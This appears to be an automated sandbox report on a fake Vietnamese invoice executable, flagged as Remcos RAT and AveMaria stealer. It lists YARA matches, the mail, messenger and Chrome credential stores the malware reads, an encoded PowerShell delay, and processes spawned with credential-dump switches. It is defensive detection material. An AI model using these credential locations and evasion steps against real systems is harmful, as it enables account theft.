Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Yara detected WebBrowserPassView password recovery tool

Source: Yara match

File source: Process Memory Space: aspnet_compiler.exe PID: 4884, type: MEMORYSTR

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk

Yara detected Credential Stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: unknown	Process created: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe "C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xbsbmhljhlcrmkvfybyknsbrlg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ivyunzdcvtueoyrjhmkmqwoatvkpua"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\sxdnnkoerbmjyegnzxxfbjirubcqnlslo"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\xzhdfxk"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\huvvgpvbsu"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jwaohifvgcnaz"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\bbmbgkgdsftq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\mvrmgcrxgnlvkuc"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\wyeehvbyuvdiuiytom"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\odqrgxczfqkyvjblz"
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\jzlrsem"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ubrkswxpfz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\evectoiqthdfs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\ixjslbemgsufoiuudk"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\tzolmupfuamrqwiynvqal"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe /stext "C:\Users\user\AppData\Local\Temp\dttwnmhhiiewacecwgdtoztjz"	Jump to behavior
